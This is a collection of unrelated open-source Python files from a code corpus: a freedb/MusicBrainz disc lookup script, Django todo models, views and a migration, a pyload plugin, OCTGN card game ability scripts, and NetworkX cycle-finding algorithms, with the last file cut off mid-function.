```
-> cddb query discid ntrks off1 off2 ... nsecs
discid:
CD disc ID number. Example: f50a3b13
ntrks:
Total number of tracks on CD.
off1, off2, ...:
Frame offset of the starting location of each track.
nsecs:
Total playing length of CD in seconds.
```
Source: http://ftp.freedb.org/pub/freedb/latest/CDDBPROTO
"""
return "%s %s %s %s" % (
disc.freedb_id,
disc.last_track_num,
" ".join([str(track.offset) for track in disc.tracks]),
disc.seconds,
)
def main():
result = None
musicbrainzngs.set_hostname(MUSICBRAINZ_HOST)
musicbrainzngs.set_useragent('freedb2musicbrainz.py', __version__,
contact='Freso')
try:
disc = discid.read(features=['mcn'])
except discid.disc.DiscError as err:
print("Error reading disc: %s" % (err))
exit(1)
try:
result = musicbrainzngs.get_releases_by_discid(disc.id)
except musicbrainzngs.ResponseError as err:
print(
'Disc not currently in MusicBrainz (or bad response): %s' %
(err)
)
if result:
if result.get('disc'):
print('This release seems to already be in MusicBrainz.')
print('Check %s to verify that it is the same or submit your specific copy' %
(disc.submission_url))
elif result.get("cdstub"):
print('There seems to be a CD stub of your disc.')
print('Go to %s to add the stub fully into the database.' %
(disc.submission_url))
else:
print('The release seems to not be in MusicBrainz. Let’s try FreeDB…')
freedb = Cddb.CddbServer()
print(cddb_lookup_string(disc))
result = freedb.getDiscs(cddb_lookup_string(disc))
if result:
for r in result:
print(r.artist, "-", r.title)
else:
print('This release is non-existant! Add it to MB!!')
print(disc.submission_url)
if __name__ == '__main__':
main()
|
Freso/freedb2musicbrainz
|
freedb2musicbrainz.py
|
Python
|
gpl-3.0
| 3,656
|
# KissTodo - a simple, Django based todo management tool.
# Copyright (C) 2011 Massimo Barbieri - http://www.massimobarbieri.it
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.db import models
from django.db.models import Q
from datetime import date, datetime, timedelta
from dateutil.relativedelta import relativedelta
# from dbindexer.api import register_index
class ListManager(models.Manager):
def get_or_create_inbox(self, user):
inbox, created = self.get_or_create(name=List.INBOX_LIST_NAME, owner=user)
return inbox
class List(models.Model):
INBOX_LIST_NAME = '@inbox'
HOT_LIST_NAME = '@hot'
ALL_LIST_NAME = '@all'
TRASH_LIST_NAME = '@trash'
name = models.CharField(max_length=5000)
owner = models.CharField(max_length=255)
objects = ListManager()
def is_special(self):
return self.name==List.INBOX_LIST_NAME or self.name==List.HOT_LIST_NAME or self.name==List.TRASH_LIST_NAME
def __unicode__(self):
return u'%s' % (self.name)
def delete(self):
if self.name==List.INBOX_LIST_NAME: return
if self.name==List.HOT_LIST_NAME: return
if self.name==List.TRASH_LIST_NAME: return
if self.name==List.ALL_LIST_NAME: return
todos_raw = Todo.objects_raw.filter(list=self).all()
if len(todos_raw)>0:
inbox_list = List.objects.get_or_create_inbox(self.owner)
for t in todos_raw:
t.list=inbox_list
t.save()
self.delete_raw()
def delete_raw(self):
for t in Todo.objects_raw.filter(list=self).all(): t.delete_raw() # required by google app engine due to the lack of cascade delete
super(List, self).delete()
class Meta:
ordering = ("name","id")
class TodoManager(models.Manager):
def get_query_set(self):
return super(TodoManager, self).get_query_set().filter(deleted=False)
def hot(self, user):
next_days = datetime.now()+timedelta(days=7)
todos_with_priority = Q(complete=False, priority__lt=4)
todo_within_next_days = Q(complete=False, due_date__lte=next_days, due_date__isnull=False)
hot = list(self.filter(todos_with_priority).order_by("priority", "description"))
# GAE does not supports OR query
for t in self.filter(todo_within_next_days).order_by("due_date", "description"):
if not t in hot: hot.append(t)
#hot = self.filter(complete=False, priority__lt=4).order_by("priority", "description")
#due to a GAE limitation, it is not possibile to filter on list__owner
return [t for t in hot if t.list.owner == user]
def search(self, user, string):
#due to a GAE limitation, it is not possibile to filter on list__owner
#todos = list(self.filter(idxf_description_l_icontains=string).order_by("idxf_description_l_icontains"))
#return [t for t in todos if t.list.owner == user]
todos = self.all()
return [t for t in todos if t.list.owner == user and t.description.upper().find(string.upper())>-1]
def deleted(self, user):
deleted = super(TodoManager, self).get_query_set().filter(deleted=True).order_by("priority", "description")
#due to a GAE limitation, it is not possibile to filter on list__owner
return [t for t in deleted if t.list.owner == user]
def all_by_user(self, user):
return [t for t in self.all() if t.list.owner == user]
class Todo(models.Model):
description = models.CharField(max_length=5000)
priority = models.IntegerField(default=4)
complete = models.BooleanField(default=False)
list = models.ForeignKey(List)
deleted = models.BooleanField(default=False)
due_date = models.DateTimeField(null=True, blank=True)
repeat_type_choiches = (('', ' - no repeat - '), ('d', 'days'), ('w', 'weeks'), ('m', 'months'), ('y', 'years'),)
repeat_type = models.CharField(max_length=1, choices=repeat_type_choiches, null=True, blank=True)
repeat_every = models.IntegerField(null=True, blank=True)
external_source = models.CharField(max_length=255, blank=True)
external_id = models.CharField(null=True,max_length=2000)
notify_minutes = models.IntegerField(default=-1)
notify_todo = models.BooleanField(default=False)
time_offset = models.IntegerField(default=0)
objects = TodoManager()
objects_raw = models.Manager()
def delete(self):
if self.deleted==False:
self.deleted=True
self.save()
else:
self.delete_raw()
def toggle_complete(self):
if self.complete:
self.complete = False
else:
if (self.repeat_type and self.repeat_every):
today = datetime.now().date()
if self.repeat_type=="d":
self.due_date = today + timedelta(days=self.repeat_every)
elif self.repeat_type=="w":
self.due_date = today + timedelta(days=self.repeat_every*7)
elif self.repeat_type=="m":
self.due_date = today + relativedelta(months=self.repeat_every)
elif self.repeat_type=="y":
self.due_date = today + relativedelta(years=self.repeat_every)
self.update_notify_todo()
else:
self.complete = True
def undelete(self):
self.deleted=False
self.save()
def delete_raw(self):
super(Todo, self).delete()
def update_notify_todo(self):
if self.notify_minutes>=0:
self.notify_todo = True
else:
self.notify_todo = False
def is_today(self):
if self.due_date is None: return False
return self.due_date.date() == datetime.now().date()
def is_overdue(self):
if self.due_date is None: return False
return self.due_date.date() < datetime.now().date()
def postpone(self):
if self.due_date is None: self.due_date = datetime.now().date()
self.due_date = self.due_date + timedelta(days=1)
def __unicode__(self):
return u'%s' % (self.description)
class Meta:
ordering = ("complete","due_date","priority","description","id")
@staticmethod
def todo_sort(todos, mode):
if mode=='D':
todos=list(todos)
todos.sort(Todo._todo_sort_date)
elif mode=='P':
todos=list(todos)
todos.sort(Todo._todo_sort_priority)
elif mode=='A':
todos=list(todos)
todos.sort(Todo._todo_sort_az)
else:
raise Exception("Unknown sort mode: "+mode)
return todos
@staticmethod
def _todo_sort_date(t1, t2):
if t1.complete!=t2.complete:
if t1.complete: return 1
return -1
elif t1.due_date!=t2.due_date:
if t1.due_date==None: return 1
if t2.due_date==None: return -1
if t1.due_date<t2.due_date: return -1
return 1
elif t1.priority!=t2.priority:
if t1.priority<t2.priority: return -1
return 1
elif t1.description!=t2.description:
if not t1.description:return -1
if not t2.description:return 1
if t1.description.upper()<t2.description.upper(): return -1
return 1
elif t1.id!=t2.id:
if t1.id<t2.id: return -1
return 1
else:
return 0
@staticmethod
def _todo_sort_priority(t1, t2):
if t1.complete!=t2.complete:
if t1.complete: return 1
return -1
elif t1.priority!=t2.priority:
if t1.priority<t2.priority: return -1
return 1
elif t1.due_date!=t2.due_date:
if t1.due_date==None: return 1
if t2.due_date==None: return -1
if t1.due_date<t2.due_date: return -1
return 1
elif t1.description!=t2.description:
if not t1.description:return -1
if not t2.description:return 1
if t1.description.upper()<t2.description.upper(): return -1
return 1
elif t1.id!=t2.id:
if t1.id<t2.id: return -1
return 1
else:
return 0
@staticmethod
def _todo_sort_az(t1, t2):
if t1.complete!=t2.complete:
if t1.complete: return 1
return -1
elif t1.description!=t2.description:
if not t1.description:return -1
if not t2.description:return 1
if t1.description.upper()<t2.description.upper(): return -1
return 1
elif t1.priority!=t2.priority:
if t1.priority<t2.priority: return -1
return 1
elif t1.due_date!=t2.due_date:
if t1.due_date==None: return 1
if t2.due_date==None: return -1
if t1.due_date<t2.due_date: return -1
return 1
elif t1.id!=t2.id:
if t1.id<t2.id: return -1
return 1
else:
return 0
# register_index(Todo, {'description': 'icontains'})
|
BRupholdt/KissTodo
|
todo/models.py
|
Python
|
gpl-3.0
| 10,319
|
# -*- coding: utf-8 -*-
from module.plugins.internal.SimpleCrypter import SimpleCrypter, create_getInfo
class UploadableChFolder(SimpleCrypter):
__name__ = "UploadableChFolder"
__type__ = "crypter"
__version__ = "0.06"
__status__ = "testing"
__pattern__ = r'http://(?:www\.)?uploadable\.ch/list/\w+'
__config__ = [("activated" , "bool", "Activated" , True),
("use_premium" , "bool", "Use premium account if available" , True),
("use_subfolder" , "bool", "Save package to subfolder" , True),
("subfolder_per_pack", "bool", "Create a subfolder for each package", True)]
__description__ = """Uploadable.ch folder decrypter plugin"""
__license__ = "GPLv3"
__authors__ = [("guidobelix", "guidobelix@hotmail.it"),
("Walter Purcaro", "vuolter@gmail.com")]
LINK_PATTERN = r'"(.+?)" class="icon_zipfile">'
NAME_PATTERN = r'<div class="folder"><span> </span>(?P<N>.+?)</div>'
OFFLINE_PATTERN = r'We are sorry... The URL you entered cannot be found on the server.'
TEMP_OFFLINE_PATTERN = r'<div class="icon_err">'
getInfo = create_getInfo(UploadableChFolder)
|
fzimmermann89/pyload
|
module/plugins/crypter/UploadableChFolder.py
|
Python
|
gpl-3.0
| 1,264
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-16 05:35
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0002_auto_20170215_0652'),
]
operations = [
migrations.AddField(
model_name='zapinstance',
name='pid',
field=models.IntegerField(default=1234, verbose_name='PID'),
preserve_default=False,
),
]
|
makemytrip/webGuard-Server
|
api/migrations/0003_zapinstance_pid.py
|
Python
|
gpl-3.0
| 505
|
#-*- coding: utf-8 -*-
from django.views.decorators.csrf import csrf_exempt
from django.shortcuts import render
from django.http import HttpResponse
from profs.processing import *
from profs.models import *
from profs.forms import *
def main(request):
return render(request, "profs/main.html", locals())
def about(request):
return render(request, "profs/about.html", locals())
def contact(request):
return render(request, "profs/contact.html", locals())
@csrf_exempt
# @vary_on_headers('HTTP_X_REQUESTED_WITH') # Needed when using caching
def modules(request):
displayedModules = Module.objects.all()
if request.method == "POST":
form = ModulesForm(request.POST)
if form.is_valid():
semester = Semester.objects.filter(name=form.cleaned_data['semester']) or Semester.objects.all()
subject = Subject.objects.filter(name=form.cleaned_data['subject']) or Subject.objects.all()
teacher = Teacher.objects.filter(name=form.cleaned_data['teacher']) or Teacher.objects.all()
displayedModules = displayedModules.filter(semester__in=semester, subject__in=subject, teacher__in=teacher)
if request.is_ajax():
xmlResponse = Taconite()
xmlResponse.show(".collection > a")
hiddenModules = Module.objects.exclude(id__in=displayedModules)
for module in hiddenModules:
xmlResponse.hide(".collection > a[href=\"" + module.get_absolute_url() + "\"]")
for isemester in Semester.objects.all(): # TODO: Factorisation
result = Module.objects.filter(semester=isemester, subject__in=subject, teacher__in=teacher).exists()
xmlResponse.disable("#id_semester > [value=\"" + str(isemester.id) + "\"]", not result)
for isubject in Subject.objects.all():
result = Module.objects.filter(semester__in=semester, subject=isubject, teacher__in=teacher).exists()
xmlResponse.disable("#id_subject > [value=\"" + str(isubject.id) + "\"]", not result)
for iteacher in Teacher.objects.all():
result = Module.objects.filter(semester__in=semester, subject__in=subject, teacher=iteacher).exists()
xmlResponse.disable("#id_teacher > [value=\"" + str(iteacher.id) + "\"]", not result)
xmlResponse.js("$(\"select\").material_select();")
return HttpResponse(xmlResponse, content_type="text/xml")
else:
form = ModulesForm()
return render(request, "profs/modules.html", locals())
@csrf_exempt
def module(request, semester, subject, teacher):
semester = Semester.objects.get(slug=semester)
subject = Subject.objects.get(slug=subject)
teacher = Teacher.objects.get(slug=teacher)
module = Module.objects.get(semester=semester, subject=subject, teacher=teacher)
comments = module.comments.all().filter(validated=True)
if request.method == "POST":
form = AddCommentForm(request.POST)
if form.is_valid():
new_comment = form.save(commit=False) # form is a ModelForm
new_comment.module = module
new_comment.save()
thanks = createThanks()
else:
form = AddCommentForm()
return render(request, "profs/module.html", locals())
|
LeMinaw/minaw.net
|
profs/views.py
|
Python
|
gpl-3.0
| 3,465
|
# Python Scripts for the Card Fighters' Clash definition for OCTGN
# Copyright (C) 2013 Raohmaru
# This python script is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this script. If not, see <http://www.gnu.org/licenses/>.
#---------------------------------------------------------------------------
# Abilities class
#---------------------------------------------------------------------------
class RulesAbilities():
""" Class to handle card's abilities """
items = {}
@staticmethod
def register(name, event, checkFunc = None, onAdded = None, onRemoved = "abl_removed"):
msg = MSG_AB[name] if name in MSG_AB else None
RulesAbilities.items[name] = {
'event' : event,
'msg' : msg,
'checkFunc': checkFunc,
'onAdded' : onAdded,
'onRemoved': onRemoved
}
@staticmethod
def addAll(abilites, card_id):
for ability in abilites:
RulesAbilities.add(ability, card_id)
@staticmethod
def add(abilityName, target_id, source_id = None, restr = None):
if abilityName in RulesAbilities.items:
ability = RulesAbilities.items[abilityName]
obj = getPlayerOrCard(target_id)
debug("-- adding ability '{}' to {}", abilityName, obj)
abl_add(ability, target_id, source_id, restr)
if ability['onAdded']:
ability['onAdded'](obj, restr)
else:
debug("-- ability not found: {}", abilityName)
@staticmethod
def remove(ability, card_id):
card = Card(card_id)
debug("-- removing ability '{}' from {}", ability, card)
if ability in RulesAbilities.items:
if removeGameEventListener(card_id, RulesAbilities.items[ability]['event'], 'abl_genericListener'):
notify("{} has lost the {} ability".format(card, ability))
#---------------------------------------------------------------------------
# Related functions
#---------------------------------------------------------------------------
def getPlayerOrCard(id):
if id in [p._id for p in players]:
return Player(id)
else:
return Card(id)
def getObjName(obj):
if isinstance(obj, (int, long)):
obj = getPlayerOrCard(obj)
if hasattr(obj, 'Name'):
return obj.Name
else:
return obj.name
def getTextualRestr(restr):
if not restr:
return ''
if restr[1] in RS_KW_RESTR_LABELS:
player = me
if restr[0] == RS_PREFIX_OPP:
player = getOpp()
return ' ' + RS_KW_RESTR_LABELS[restr[1]].format(player)
return restr(1)
def notifyAbility(target_id, source_id = None, msg = None, restr = '', isWarning = False):
obj = getPlayerOrCard(target_id)
source = obj
if source_id is not None:
source = Card(source_id)
if msg is not None:
func = warning if isWarning else notify
name = obj
if isPlayer(obj) or isWarning:
if isPlayer(obj) and isWarning:
name = 'You'
else:
name = getObjName(obj)
func(msg.format(name, source.Name, source.properties['Ability Name'], restr))
#---------------------------------------------------------------------------
# Abilities functions
#---------------------------------------------------------------------------
def abl_add(abl, obj_id, source_id = None, restr = None):
event = abl['event']
msg = abl['msg']
checkFunc = abl['checkFunc']
onRemove = abl['onRemoved']
debug(">>> abl_add({}, {}, {}, {}, {}, {}, {})", obj_id, event, source_id, restr, msg, checkFunc, onRemove)
eventAdded = addGameEventListener(event, 'abl_genericListener', obj_id, source_id, restr, [obj_id, source_id, msg, checkFunc, restr], onRemove = onRemove)
if eventAdded and msg:
notifyAbility(obj_id, source_id if source_id else obj_id, msg[0], getTextualRestr(restr))
def abl_genericListener(target_id, obj_id, source_id = None, msgOrFunc = None, checkFunc = None, restr = None):
""" Checks if the original card with the ability is equal to the second card the system wants to check """
debug(">>> abl_genericListener({}, {}, {}, {}, {})", target_id, obj_id, source_id, msgOrFunc, checkFunc)
callFunc = False
if checkFunc is None and isinstance(msgOrFunc, basestring):
checkFunc = msgOrFunc
callFunc = True
if target_id == obj_id or callFunc:
if checkFunc is None:
debug("Ability callback: False")
return False
else:
debug("Invoking ability callback: {}", checkFunc)
checkFunc = eval(checkFunc)
return checkFunc(target_id)
return True
def callback_false(obj_id):
return False
def abl_unfreezable(obj_id):
setMarker(Card(obj_id), 'Unfreezable')
return False
def abl_pierce(obj_id):
setMarker(Card(obj_id), 'Pierce')
return False
def abl_frosted_added(card, restr = None):
if not hasMarker(card, 'Cannot Unfreeze'):
doesNotUnfreeze(card, restr)
def abl_removeFrost(obj_id):
card = Card(obj_id)
if hasMarker(card, 'Cannot Unfreeze'):
doesNotUnfreeze(card)
return False
def abl_cantattack_added(card, restr = None):
if isAttacking(card):
cancelAttack(card)
def abl_cantblock_added(card, restr = None):
setMarker(card, 'Cannot Block')
if isBlocking(card):
cancelBlock(card)
def abl_cantblock_removed(obj_id, source_id, msg, checkFunc, restr = None):
removeMarker(Card(obj_id), 'Cannot Block')
# It's mandatory to call this function
abl_removed(obj_id, source_id, msg, checkFunc, restr)
def abl_rush_added(card, restr = None):
if hasMarker(card, 'Just Entered'):
removeMarker(card, 'Just Entered')
def abl_removed(obj_id, source_id, msg, checkFunc, restr = None):
"""
On removed ability callback function.
"""
# If msg has 2 items it means that it is a on/off message.
# Then we want to show the message when the effect is gone because of the restr cleanup.
if restr and msg and len(msg) == 2:
notify(msg[1].format(getObjName(obj_id)))
RulesAbilities.register('unblockable', Hooks.CanBeBlocked)
RulesAbilities.register('cantattack', Hooks.BeforeAttack, onAdded = abl_cantattack_added)
RulesAbilities.register('cantblock', Hooks.BeforeBlock, onAdded = abl_cantblock_added, onRemoved = 'abl_cantblock_removed')
RulesAbilities.register('cantplayac', Hooks.BeforePlayAC)
RulesAbilities.register('cantplayre', Hooks.BeforePlayRE)
RulesAbilities.register('preventpierce', Hooks.PreventPierce)
RulesAbilities.register('rush', Hooks.PlayAsFresh, onAdded = abl_rush_added)
RulesAbilities.register('unlimitedbackup', Hooks.BackupLimit, 'callback_false')
RulesAbilities.register('pierce', GameEvents.Blocked, 'abl_pierce')
RulesAbilities.register('unfreezable', GameEvents.Attacks, 'abl_unfreezable')
RulesAbilities.register('frosted', Hooks.CallOnRemove, 'abl_removeFrost', abl_frosted_added)
|
raohmaru/CFC
|
o8g/Scripts/rs/RuleScript_abilities.py
|
Python
|
gpl-3.0
| 7,534
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "checkmate.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
esrefozturk/checkmate
|
checkmate/manage.py
|
Python
|
gpl-3.0
| 252
|
"""
========================
Cycle finding algorithms
========================
"""
from collections import defaultdict
import networkx as nx
from networkx.utils import not_implemented_for, pairwise
__all__ = [
"cycle_basis",
"simple_cycles",
"recursive_simple_cycles",
"find_cycle",
"minimum_cycle_basis",
]
@not_implemented_for("directed")
@not_implemented_for("multigraph")
def cycle_basis(G, root=None):
""" Returns a list of cycles which form a basis for cycles of G.
A basis for cycles of a network is a minimal collection of
cycles such that any cycle in the network can be written
as a sum of cycles in the basis. Here summation of cycles
is defined as "exclusive or" of the edges. Cycle bases are
useful, e.g. when deriving equations for electric circuits
using Kirchhoff's Laws.
Parameters
----------
G : NetworkX Graph
root : node, optional
Specify starting node for basis.
Returns
-------
A list of cycle lists. Each cycle list is a list of nodes
which forms a cycle (loop) in G.
Examples
--------
>>> G = nx.Graph()
>>> nx.add_cycle(G, [0, 1, 2, 3])
>>> nx.add_cycle(G, [0, 3, 4, 5])
>>> print(nx.cycle_basis(G, 0))
[[3, 4, 5, 0], [1, 2, 3, 0]]
Notes
-----
This is adapted from algorithm CACM 491 [1]_.
References
----------
.. [1] Paton, K. An algorithm for finding a fundamental set of
cycles of a graph. Comm. ACM 12, 9 (Sept 1969), 514-518.
See Also
--------
simple_cycles
"""
gnodes = set(G.nodes())
cycles = []
while gnodes: # loop over connected components
if root is None:
root = gnodes.pop()
stack = [root]
pred = {root: root}
used = {root: set()}
while stack: # walk the spanning tree finding cycles
z = stack.pop() # use last-in so cycles easier to find
zused = used[z]
for nbr in G[z]:
if nbr not in used: # new node
pred[nbr] = z
stack.append(nbr)
used[nbr] = {z}
elif nbr == z: # self loops
cycles.append([z])
elif nbr not in zused: # found a cycle
pn = used[nbr]
cycle = [nbr, z]
p = pred[z]
while p not in pn:
cycle.append(p)
p = pred[p]
cycle.append(p)
cycles.append(cycle)
used[nbr].add(z)
gnodes -= set(pred)
root = None
return cycles
@not_implemented_for("undirected")
def simple_cycles(G):
"""Find simple cycles (elementary circuits) of a directed graph.
A `simple cycle`, or `elementary circuit`, is a closed path where
no node appears twice. Two elementary circuits are distinct if they
are not cyclic permutations of each other.
This is a nonrecursive, iterator/generator version of Johnson's
algorithm [1]_. There may be better algorithms for some cases [2]_ [3]_.
Parameters
----------
G : NetworkX DiGraph
A directed graph
Returns
-------
cycle_generator: generator
A generator that produces elementary cycles of the graph.
Each cycle is represented by a list of nodes along the cycle.
Examples
--------
>>> edges = [(0, 0), (0, 1), (0, 2), (1, 2), (2, 0), (2, 1), (2, 2)]
>>> G = nx.DiGraph(edges)
>>> len(list(nx.simple_cycles(G)))
5
To filter the cycles so that they don't include certain nodes or edges,
copy your graph and eliminate those nodes or edges before calling
>>> copyG = G.copy()
>>> copyG.remove_nodes_from([1])
>>> copyG.remove_edges_from([(0, 1)])
>>> len(list(nx.simple_cycles(copyG)))
3
Notes
-----
The implementation follows pp. 79-80 in [1]_.
The time complexity is $O((n+e)(c+1))$ for $n$ nodes, $e$ edges and $c$
elementary circuits.
References
----------
.. [1] Finding all the elementary circuits of a directed graph.
D. B. Johnson, SIAM Journal on Computing 4, no. 1, 77-84, 1975.
https://doi.org/10.1137/0204007
.. [2] Enumerating the cycles of a digraph: a new preprocessing strategy.
G. Loizou and P. Thanish, Information Sciences, v. 27, 163-182, 1982.
.. [3] A search strategy for the elementary cycles of a directed graph.
J.L. Szwarcfiter and P.E. Lauer, BIT NUMERICAL MATHEMATICS,
v. 16, no. 2, 192-204, 1976.
See Also
--------
cycle_basis
"""
def _unblock(thisnode, blocked, B):
stack = {thisnode}
while stack:
node = stack.pop()
if node in blocked:
blocked.remove(node)
stack.update(B[node])
B[node].clear()
# Johnson's algorithm requires some ordering of the nodes.
# We assign the arbitrary ordering given by the strongly connected comps
# There is no need to track the ordering as each node removed as processed.
# Also we save the actual graph so we can mutate it. We only take the
# edges because we do not want to copy edge and node attributes here.
subG = type(G)(G.edges())
sccs = [scc for scc in nx.strongly_connected_components(subG) if len(scc) > 1]
# Johnson's algorithm exclude self cycle edges like (v, v)
# To be backward compatible, we record those cycles in advance
# and then remove from subG
for v in subG:
if subG.has_edge(v, v):
yield [v]
subG.remove_edge(v, v)
while sccs:
scc = sccs.pop()
sccG = subG.subgraph(scc)
# order of scc determines ordering of nodes
startnode = scc.pop()
# Processing node runs "circuit" routine from recursive version
path = [startnode]
blocked = set() # vertex: blocked from search?
closed = set() # nodes involved in a cycle
blocked.add(startnode)
B = defaultdict(set) # graph portions that yield no elementary circuit
stack = [(startnode, list(sccG[startnode]))] # sccG gives comp nbrs
while stack:
thisnode, nbrs = stack[-1]
if nbrs:
nextnode = nbrs.pop()
if nextnode == startnode:
yield path[:]
closed.update(path)
# print "Found a cycle", path, closed
elif nextnode not in blocked:
path.append(nextnode)
stack.append((nextnode, list(sccG[nextnode])))
closed.discard(nextnode)
blocked.add(nextnode)
continue
# done with nextnode... look for more neighbors
if not nbrs: # no more nbrs
if thisnode in closed:
_unblock(thisnode, blocked, B)
else:
for nbr in sccG[thisnode]:
if thisnode not in B[nbr]:
B[nbr].add(thisnode)
stack.pop()
# assert path[-1] == thisnode
path.pop()
# done processing this node
H = subG.subgraph(scc) # make smaller to avoid work in SCC routine
sccs.extend(scc for scc in nx.strongly_connected_components(H) if len(scc) > 1)
@not_implemented_for("undirected")
def recursive_simple_cycles(G):
"""Find simple cycles (elementary circuits) of a directed graph.
A `simple cycle`, or `elementary circuit`, is a closed path where
no node appears twice. Two elementary circuits are distinct if they
are not cyclic permutations of each other.
This version uses a recursive algorithm to build a list of cycles.
You should probably use the iterator version called simple_cycles().
Warning: This recursive version uses lots of RAM!
Parameters
----------
G : NetworkX DiGraph
A directed graph
Returns
-------
A list of cycles, where each cycle is represented by a list of nodes
along the cycle.
Example:
>>> edges = [(0, 0), (0, 1), (0, 2), (1, 2), (2, 0), (2, 1), (2, 2)]
>>> G = nx.DiGraph(edges)
>>> nx.recursive_simple_cycles(G)
[[0], [2], [0, 1, 2], [0, 2], [1, 2]]
See Also
--------
cycle_basis (for undirected graphs)
Notes
-----
The implementation follows pp. 79-80 in [1]_.
The time complexity is $O((n+e)(c+1))$ for $n$ nodes, $e$ edges and $c$
elementary circuits.
References
----------
.. [1] Finding all the elementary circuits of a directed graph.
D. B. Johnson, SIAM Journal on Computing 4, no. 1, 77-84, 1975.
https://doi.org/10.1137/0204007
See Also
--------
simple_cycles, cycle_basis
"""
# Jon Olav Vik, 2010-08-09
def _unblock(thisnode):
"""Recursively unblock and remove nodes from B[thisnode]."""
if blocked[thisnode]:
blocked[thisnode] = False
while B[thisnode]:
_unblock(B[thisnode].pop())
def circuit(thisnode, startnode, component):
closed = False # set to True if elementary path is closed
path.append(thisnode)
blocked[thisnode] = True
for nextnode in component[thisnode]: # direct successors of thisnode
if nextnode == startnode:
result.append(path[:])
closed = True
elif not blocked[nextnode]:
if circuit(nextnode, startnode, component):
closed = True
if closed:
_unblock(thisnode)
else:
for nextnode in component[thisnode]:
if thisnode not in B[nextnode]: # TODO: use set for speedup?
B[nextnode].append(thisnode)
path.pop() # remove thisnode from path
return closed
path = [] # stack of nodes in current path
blocked = defaultdict(bool) # vertex: blocked from search?
B = defaultdict(list) # graph portions that yield no elementary circuit
result = [] # list to accumulate the circuits found
# Johnson's algorithm exclude self cycle edges like (v, v)
# To be backward compatible, we record those cycles in advance
# and then remove from subG
for v in G:
if G.has_edge(v, v):
result.append([v])
G.remove_edge(v, v)
# Johnson's algorithm requires some ordering of the nodes.
# They might not be sortable so we assign an arbitrary ordering.
ordering = dict(zip(G, range(len(G))))
for s in ordering:
# Build the subgraph induced by s and following nodes in the ordering
subgraph = G.subgraph(node for node in G if ordering[node] >= ordering[s])
# Find the strongly connected component in the subgraph
# that contains the least node according to the ordering
strongcomp = nx.strongly_connected_components(subgraph)
mincomp = min(strongcomp, key=lambda ns: min(ordering[n] for n in ns))
component = G.subgraph(mincomp)
if len(component) > 1:
# smallest node in the component according to the ordering
startnode = min(component, key=ordering.__getitem__)
for node in component:
blocked[node] = False
B[node][:] = []
dummy = circuit(startnode, startnode, component)
return result
def find_cycle(G, source=None, orientation=None):
"""Returns a cycle found via depth-first traversal.
The cycle is a list of edges indicating the cyclic path.
Orientation of directed edges is controlled by `orientation`.
Parameters
----------
G : graph
A directed/undirected graph/multigraph.
source : node, list of nodes
The node from which the traversal begins. If None, then a source
is chosen arbitrarily and repeatedly until all edges from each node in
the graph are searched.
orientation : None | 'original' | 'reverse' | 'ignore' (default: None)
For directed graphs and directed multigraphs, edge traversals need not
respect the original orientation of the edges.
When set to 'reverse' every edge is traversed in the reverse direction.
When set to 'ignore', every edge is treated as undirected.
When set to 'original', every edge is treated as directed.
In all three cases, the yielded edge tuples add a last entry to
indicate the direction in which that edge was traversed.
If orientation is None, the yielded edge has no direction indicated.
The direction is respected, but not reported.
Returns
-------
edges : directed edges
A list of directed edges indicating the path taken for the loop.
If no cycle is found, then an exception is raised.
For graphs, an edge is of the form `(u, v)` where `u` and `v`
are the tail and head of the edge as determined by the traversal.
For multigraphs, an edge is of the form `(u, v, key)`, where `key` is
the key of the edge. When the graph is directed, then `u` and `v`
are always in the order of the actual directed edge.
If orientation is not None then the edge tuple is extended to include
the direction of traversal ('forward' or 'reverse') on that edge.
Raises
------
NetworkXNoCycle
If no cycle was found.
Examples
--------
In this example, we construct a DAG and find, in the first call, that there
are no directed cycles, and so an exception is raised. In the second call,
we ignore edge orientations and find that there is an undirected cycle.
Note that the second call finds a directed cycle while effectively
traversing an undirected graph, and so, we found an "undirected cycle".
This means that this DAG structure does not form a directed tree (which
is also known as a polytree).
>>> G = nx.DiGraph([(0, 1), (0, 2), (1, 2)])
>>> try:
... nx.find_cycle(G, orientation='original')
... except:
... pass
...
>>> list(nx.find_cycle(G, orientation='ignore'))
[(0, 1, 'forward'), (1, 2, 'forward'), (0, 2, 'reverse')]
See Also
--------
simple_cycles
"""
if not G.is_directed() or orientation in (None, "original"):
def tailhead(edge):
return edge[:2]
elif orientation == "reverse":
def tailhead(edge):
return edge[1], edge[0]
elif orientation == "ignore":
def tailhead(edge):
if edge[-1] == "reverse":
return edge[1], edge[0]
return edge[:2]
explored = set()
cycle = []
final_node = None
for start_node in G.nbunch_iter(source):
if start_node in explored:
# No loop is possible.
continue
edges = []
# All nodes seen in this iteration of edge_dfs
seen = {start_node}
# Nodes in active path.
active_nodes = {start_node}
previous_head = None
for edge in nx.edge_dfs(G, start_node, orientation):
# Determine if this edge is a continuation of the active path.
tail, head = tailhead(edge)
if head in explored:
# Then we've already explored it. No loop is possible.
continue
if previous_head is not None and tail != previous_head:
# This edge results from backtracking.
# Pop until we get a node whose head equals the current tail.
# So for example, we might have:
# (0, 1), (1, 2), (2, 3), (1, 4)
# which must become:
# (0, 1), (1, 4)
while True:
try:
popped_edge = edges.pop()
except IndexError:
edges = []
active_nodes = {tail}
break
else:
popped_head = tailhead(popped_edge)[1]
active_nodes.remove(popped_head)
if edges:
last_head = tailhead(edges[-1])[1]
if tail == last_head:
break
edges.append(edge)
if head in active_nodes:
# We have a loop!
cycle.extend(edges)
final_node = head
break
else:
seen.add(head)
active_nodes.add(head)
previous_head = head
if cycle:
break
else:
